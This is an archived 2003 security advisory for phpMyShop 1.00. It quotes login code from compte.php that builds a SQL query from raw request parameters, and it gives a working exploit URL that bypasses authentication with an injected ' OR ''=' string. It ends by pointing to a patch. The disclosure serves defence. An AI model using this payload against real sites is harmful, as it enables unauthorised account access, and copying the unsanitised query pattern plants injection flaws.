Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: sb5963.htm

phpMyShop SQL Injection



3rd Feb 2003 [SBWID-5963]
COMMAND

	phpMyShop SQL Injection

SYSTEMS AFFECTED

	phpMyShop 1.00

PROBLEM

	Frog Man [leseulfrog@hotmail.com] found :
	
	 PHP Code/Location :
	 같같같같같같같같같
	
	compte.php :
	---------------------------------------------------------------
	<?
	session_start();
	
	if (isset($achat))
	{
	session_register("achat");
	}
	else
	{
	header("location:index.php");
	}
	
	include("design/header.php");
	require("config.php");
	require("fonction.php");
	
	echo"<td bgcolor=\"$barre1\"><strong>Identification</strong></td>
	  </tr>
	  <tr>
	    <td><br>";
	
	if (isset($valider)) { $sql  =  "SELECT  id_cli,login_cli,pass_cli  FROM
	$table_client where login_cli='$identifiant' and  pass_cli='$password'";
	$sql =  mysql_db_query($base,$sql);  $test  =  mysql_num_rows($sql);  if
	($test=="0") { ?> <script  language="javascript">  alert("Identifiant
	ou    mot    de    passe    non    valide!");     </script>     <?
	echo"<center><strong>Identifiant   ou    mot    de    passe    non
	valide!</strong></center><br>";   }   else   {   $id_membre   =
	mysql_result($sql,0,"id_cli");     session_register("id_membre");     ?>
	<script  language="javascript">   document.location.href="valide.php"
	</script> <? } }
	
	[...] ---------------------------------------------------------------
	
	
	
	 Exploit :
	 같같같같
	
	 http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
	

SOLUTION

	Check, http://www.pc-encheres.com
	
	-Also-
	
	A patch has been published on http://www.phpsecure.info .
	
	 More details :
	 같같같같같같같
	
	http://www.frog-man.org/tutos/phpmyshop.txt
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH